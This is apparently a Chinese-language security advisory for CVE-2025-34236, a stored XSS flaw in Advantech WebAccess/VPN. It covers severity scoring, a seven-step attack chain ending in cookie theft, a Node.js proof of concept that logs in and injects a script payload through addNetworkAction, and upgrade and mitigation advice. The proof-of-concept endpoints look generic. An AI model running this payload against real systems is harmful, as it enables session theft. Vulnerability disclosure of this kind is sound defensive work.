CVE-2025-34236: Advantech WebAccess/VPN 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-34236

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Advantech WebAccess/VPN

漏洞概述

CVE-2025-34236是Advantech WebAccess/VPN 1.1.5之前版本中存在的一个存储型跨站脚本(XSS)漏洞。该漏洞源于NetworksController.addNetworkAction()函数对用户输入的验证和转义不充分。攻击者可以通过在网络配置参数中注入恶意JavaScript代码，当其他用户访问相关页面时，恶意脚本会在受害者浏览器上下文中执行。存储型XSS相比反射型XSS更为危险，因为恶意代码被永久存储在服务器端，所有访问该内容的用户都会受到影响。攻击者可能利用此漏洞窃取会话Cookie、劫持用户会话、进行钓鱼攻击或修改页面显示内容，对用户数据安全和系统完整性造成威胁。

技术细节

该漏洞存在于Advantech WebAccess/VPN的NetworksController.addNetworkAction()方法中。攻击者通过低权限账户登录系统后，在创建网络配置时将恶意JavaScript代码作为网络名称或其他参数值提交。由于后端未对用户输入进行充分的输入验证和安全转义，恶意代码被直接存储到数据库中。当管理员或其他用户查看网络列表或相关页面时，存储的恶意脚本被浏览器解析执行。攻击者可利用此漏洞窃取受害者的会话令牌、凭据或其他敏感信息，甚至可能通过横向移动进一步危害系统安全。CVSS 3.1评分5.4反映了该漏洞需要网络远程攻击、低权限认证和用户交互才能利用，且对机密性和完整性的影响均为低级别。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者通过NVD、VulnDB等漏洞数据库收集CVE-2025-34236的漏洞信息，确认目标为Advantech WebAccess/VPN的NetworksController组件

STEP 2

步骤2

获取低权限账户：攻击者通过默认凭据、暴力破解或社会工程学手段获取系统普通用户账户

STEP 3

步骤3

注入恶意代码：使用低权限账户登录WebAccess/VPN系统，通过addNetworkAction接口在网络名称或其他输入字段中注入XSS恶意载荷

STEP 4

步骤4

持久化存储：恶意JavaScript代码被未经过滤地存储到数据库中，攻击者退出登录后代码仍然存在

STEP 5

步骤5

触发执行：当管理员或高权限用户访问网络配置页面时，浏览器解析并执行存储的恶意脚本

STEP 6

步骤6

窃取敏感信息：恶意脚本获取用户Cookie、会话令牌等敏感数据并发送给攻击者控制的服务器

STEP 7

步骤7

会话劫持：攻击者利用窃取的会话信息冒充合法用户进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-34236 PoC - Stored XSS in Advantech WebAccess/VPN
// Target: NetworksController.addNetworkAction()
// Payload: <script>alert(document.cookie)</script>

const axios = require('axios');

const TARGET_URL = 'http://target-website.com';
const USERNAME = 'attacker_user';
const PASSWORD = 'password123';

async function exploitStoredXSS() {
    try {
        // Step 1: Login to get authentication token
        const loginResponse = await axios.post(`${TARGET_URL}/api/auth/login`, {
            username: USERNAME,
            password: PASSWORD
        });
        const authToken = loginResponse.data.token;
        
        // Step 2: Inject XSS payload via addNetworkAction
        const xssPayload = '<script>alert(document.cookie)</script>';
        const networkData = {
            networkName: xssPayload,
            networkType: 'VPN',
            description: 'XSS Test Network'
        };
        
        const exploitResponse = await axios.post(
            `${TARGET_URL}/api/networks/addNetworkAction`,
            networkData,
            {
                headers: {
                    'Authorization': `Bearer ${authToken}`,
                    'Content-Type': 'application/json'
                }
            }
        );
        
        console.log('XSS payload injected successfully');
        console.log('Payload will execute when admin views network list');
        
    } catch (error) {
        console.error('Exploitation failed:', error.message);
    }
}

exploitStoredXSS();

影响范围

Advantech WebAccess/VPN < 1.1.5

防御指南

临时缓解措施

立即将Advantech WebAccess/VPN升级到1.1.5或更高版本以修复该漏洞。在升级前，可通过限制对网络管理功能的访问权限、启用WAF防护、监控异常请求日志等方式进行临时缓解。同时建议对所有用户进行安全意识培训，提醒不要点击来源不明的链接。